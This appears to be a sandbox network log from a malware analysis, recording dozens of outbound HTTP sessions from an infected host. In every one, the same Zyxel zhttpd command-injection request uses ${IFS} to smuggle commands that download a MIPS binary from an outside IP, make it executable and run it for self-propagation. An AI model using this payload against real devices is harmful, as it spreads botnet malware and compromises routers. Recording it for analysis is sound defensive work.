                                                      Feb 2, 2024 06:35:54.657082081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4713192.168.2.14433724.7.86.48443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.657129049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4714192.168.2.145645497.182.35.203443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.657155037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4715192.168.2.146078473.53.115.114443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.657187939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4716192.168.2.1443096160.104.80.162443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.657238960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4717192.168.2.1448652144.14.1.118443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.657279015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4718192.168.2.1434912184.118.25.138443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.657325983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4719192.168.2.145761894.103.242.244443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.657362938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4720192.168.2.1450168131.233.200.38443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.657411098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4721192.168.2.144055618.1.153.69443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.657463074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4722192.168.2.145711846.63.77.100443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.657510042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4723192.168.2.1441998190.162.235.204443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.657543898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4724192.168.2.145345068.26.69.17443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.657572031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4725192.168.2.1453608206.221.206.61443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.657603979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4726192.168.2.144977039.179.43.187443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.657625914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4727192.168.2.1460770194.122.99.87443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.657651901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4728192.168.2.143593031.219.106.157443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.657687902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4729192.168.2.1448144141.165.43.224443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.657710075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4730192.168.2.1439148223.25.35.116443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.657767057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4731192.168.2.143721827.128.204.247443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.657812119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4732192.168.2.1444684151.216.116.152443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.657844067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4733192.168.2.144426692.9.251.145443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.657898903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4734192.168.2.1449106187.5.196.162443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.657929897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4735192.168.2.1435900177.128.184.3443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.657994032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4736192.168.2.144139065.139.207.234443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.658030987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4737192.168.2.1451072128.84.119.133443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.658058882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4738192.168.2.145466478.3.18.165443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.658118010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4739192.168.2.1445616217.148.88.193443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.658145905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4740192.168.2.1448554125.61.140.225443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.658202887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4741192.168.2.143377251.168.10.253443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.658221006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4742192.168.2.145775651.153.36.127443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.658272028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4743192.168.2.146093612.205.129.130443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.658318996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4744192.168.2.1459330123.135.95.16443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.658375025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4745192.168.2.1445256117.238.253.246443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.658416986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4746192.168.2.1451142126.254.0.225443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.658457994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4747192.168.2.1445882182.126.214.183443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.658493042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4748192.168.2.143534660.110.64.18443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.658508062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4749192.168.2.1432864123.127.166.91443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.658567905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4750192.168.2.1436098119.181.11.191443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.658601046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4751192.168.2.1441574113.173.153.67443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.658648968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4752192.168.2.1440960196.165.106.132443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.658709049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4753192.168.2.143898490.40.96.194443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.658746004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4754192.168.2.1448602166.136.197.87443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.658781052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4755192.168.2.145534295.156.93.193443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.658801079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4756192.168.2.144612618.191.244.43443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.658860922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4757192.168.2.1455808118.190.186.160443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.658885956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4758192.168.2.145312681.22.177.12443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.658942938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4759192.168.2.1435944164.116.9.239443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.658984900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4760192.168.2.1447084175.109.219.94443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.659039974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4761192.168.2.1442268147.223.128.214443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.659085035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4762192.168.2.1455006218.158.56.72443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.659116030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4763192.168.2.144276665.138.163.176443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.659167051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4764192.168.2.145462425.111.237.187443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.659225941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4765192.168.2.143629880.108.98.234443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.659249067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4766192.168.2.1450262190.38.84.100443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.659293890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4767192.168.2.1454692106.165.49.82443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.659337997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4768192.168.2.145042220.95.150.120443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.659368038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4769192.168.2.1453494198.115.43.10443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.659399033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4770192.168.2.1438692168.57.199.35443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.659440041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4771192.168.2.145951074.78.120.138443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.659463882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4772192.168.2.145922053.233.229.115443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.659507990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4773192.168.2.143380040.29.38.191443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.659555912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4774192.168.2.14422584.230.39.137443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:54.659593105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4775192.168.2.143442446.165.241.57443
                                                      TimestampBytes transferredDirectionData
